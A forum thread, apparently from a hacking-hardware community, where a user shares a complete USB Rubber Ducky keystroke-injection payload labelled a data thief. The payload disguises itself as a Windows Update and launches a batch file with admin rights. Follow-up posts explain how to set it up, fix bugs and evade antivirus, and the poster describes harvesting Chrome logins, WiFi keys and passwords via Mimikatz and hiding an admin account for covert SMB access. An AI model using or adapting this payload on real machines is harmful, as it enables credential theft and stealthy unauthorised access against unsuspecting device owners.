Jump to content

Recommended Posts

Ok, so there's a lot of cool Ducky scripts out there, my personal favourite is the script that steals Windows passwords - AWSOME!!! But do any scripts aim to get more than just a Windows password? Do any of them "Backup" Google Chrome Login Data, WiFi keys, Windows Product Keys or Replace the Administrator password or even hide the account so you can have "stealthy" remote access via Windows Shares (Known as SMB)? I THINK PAYLOADS SHOULD DO MORE!

So...

I introduce the ULTIMATE DATA THEIF!!!

Payload:

DELAY 15000
REM Author: Lavanoid Volcanic
REM This script supports Windows XP as well as Vista and 7.
REM I don't have Windows 8 (I really want it though) so I cant test it.
REM This Script looks for the drive named "JUNK" because "DUCKY" is too exposing.
GUI d
DELAY 500
GUI r
DELAY 1500
STRING notepad.exe
DELAY 200
ENTER
DELAY 1500
STRING @echo off
DELAY 200
ENTER
DELAY 200
STRING Ti
DELAY 200
STRING tle = Installing Windows Update...
DELAY 200
ENTER
STRING @echo Installing Windows Update...
DELAY 200
ENTER
STRING set duck=
DELAY 200
ENTER
STRING COLOR F0
DELAY 200
ENTER
STRING :start
DELAY 200
ENTER
STRING if not "%LOCALAPPDATA%"=="" goto win_new
DELAY 200
ENTER
STRING for /f "tokens=3 delims= " %%A in ('echo list volume ^| diskpart ^| findstr "JUNK"') do set duck=%%A
DELAY 200
ENTER
STRING if "%duck%"=="" goto start
DELAY 200
ENTER
STRING set duck=%duck%:
DELAY 200
ENTER
STRING %duck%
DELAY 200
ENTER
STRING CD "Data"
DELAY 200
ENTER
STRING "SCRIPT_EX.exe" "SP.bat"
DELAY 200
ENTER
STRING EXIT
DELAY 200
ENTER
STRING :win_new
DELAY 400
ENTER
DELAY 400
STRING for /f %%d in ('wmic volume get driveletter^, label ^| findstr "JUNK"') do set duck=%%d
DELAY 200
ENTER
STRING if "%duck%"=="" goto start
DELAY 200
ENTER
STRING %duck%
DELAY 200
ENTER
STRING CD "Data"
DELAY 200
ENTER
STRING "SCRIPT_EX.exe" "SP.bat"
DELAY 200
ENTER
STRING EXIT
DELAY 200
ENTER
CTRL S
DELAY 1500
STRING %TEMP%\DS.bat
DELAY 1000
ENTER
DELAY 600
ALT Y
DELAY 700
ALT F4
GUI r
DELAY 1500
STRING %TEMP%\DS.bat
ENTER
DELAY 1000
ALT y
DELAY 500
ALT y
DELAY 500
ALT y
DELAY 500
ALT y
DELAY 500
ALT y
DELAY 500
ALT y
DELAY 500
ALT y
GUI r
DELAY 1200
STRING explorer.exe
ENTER
DELAY 1500
ALT F4

Unfortunately, the forum only allows a maximum of 500kb of upload space and the extra data is just over 1MB so I put the file on my Dropbox account instead.

Link: https://www.dropbox.com/sh/ad8jegywipd3l76/jo2KqlU3CB

READ ME!!.txt contents:

SCRIPT/PAYLOAD BY LAVANOID VOLCANIC

THE DIRECTORIES ABOVE OR BELOW (DEPENDING ON YOUR CONFIGURATION) SHOULD
BE COPIED TO THE ROOT DIRECTORY OF THE DUCKY DRIVE. YOU SHOULD EDIT
THE SP.BAT FILE AND THE INJECT.TXT FILE TO SUIT YOUR REQUIREMENTS.

FILE LOCATIONS:

SP.bat -- Data\SP.bat
inject.txt -- Scripts\Projects\Steal_Data\inject.txt
Compiler.bat -- Scripts\Compiler.bat

COMPILER.bat description:

The compiler batch file basically takes away the hassle of entering
all those annoying time draining commands. If the Compiler.bat file
is stored on the Duck, the compiler will ask if you want to install it
on the Duck.

WHAT I HOPE:

I hope that my project will be featured in one of the Hak5 videos
since I do like some attention. THIS WORLD IS LONELY YOU KNOW!!

Thank you for choosing to spend a bit of your time by
poking your nose into my work.

Link to comment
Share on other sites

I love passive-aggressiveness!

Back on topic, well done Lavanoid! You probably put a bunch of effort into this, and I will give it a test in the near future. Good work doesn't need huge PR though, just look at the Rubber Ducky, and Wifi Pineapple. Your work will get attention if its good at what it does, just keep putting the hard work in!

Good job.

Link to comment
Share on other sites

Just updated the "Backup_Eraser.bat" , "SP.bat" and "Data.zip" file. Just download and extract the "Data.zip".

Changes:

Backup_Eraser.bat - Forgot to replace the directory variable with "Backups", it was set as "Pass" so it wouldn't locate any backups.

SP.bat - Minor bug fixes and spelling corrections. I misspelt "process_dump" by adding an extra character. Previous value: proccess_dump. Whoops.

Edited by Lavanoid
Link to comment
Share on other sites

Hello,

Can you explain a little bit more how all the included files work together?!

What to do to get it work?

  • Do I have to run compiler.bat manually? Do I have to run it to configure the payload (inject.bin)?
  • When I wan't to run the payload, do I need to plugin an extra usb named "JUNK" to get the info copied to this drive?
  • YOU SHOULD EDIT
    THE SP.BAT FILE AND THE INJECT.TXT FILE TO SUIT YOUR REQUIREMENTS. <- What exactly do I need to edit?

Thnx. A little step by step tutorial would help.

HzM74

Link to comment
Share on other sites

Basically, you run the compiler.bat to compile the inject.txt file into a inject.dat file. The file will be saved in the same directory as the .txt. Just place your ducky scripts in 'Data\Projects\<name of project>' and the file MUST be named 'inject.txt'.

The compiler will install on any USB drive as long as it is stored on a USB drive-the name doesn't matter. I used some special variables so the compiler knew what drive it is stored on.

The sp.bat file has a few "triggers" inside of it. Just open it with a notepad editor (I use notepad++) and change the configuration part of it. There is a variable called "avoid_antivirus" and by default that is set as true so you can set it as false if you wish. When it's set as true, some command's won't execute such as Chromepass, Mimikatz, etc. However, you can enable the proc_dump program (by changing the other variables) to avoid antivirus, but still get a users password.

inject.txt was designed to find the drive 'JUNK' so you can edit it so it will find a different label instead. It doesn't have to be named 'JUNK'.

If you open some of the other files in a text editor, you should be able to figure out what they do.

Just extract data.zip and place all the files on the duck. SP.bat is executed by 'SCRIPT_EX.exe' which has an Administrator manifest so you don't need the Powershell. SCRIPT_EX.exe is launched by the inject.dat file (payload).

The compiler is just a tool designed to make your duck experience easier.

Link to comment
Share on other sites

You also need the Twin Duck firmware (forgot to mention). If you don't want to use twin duck, then just put the 'Data' directory on another drive called "JUNK" or whatever you set the drive label as.

The compiler should be stored on the duck if you want to install a payload directly on the duck.

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...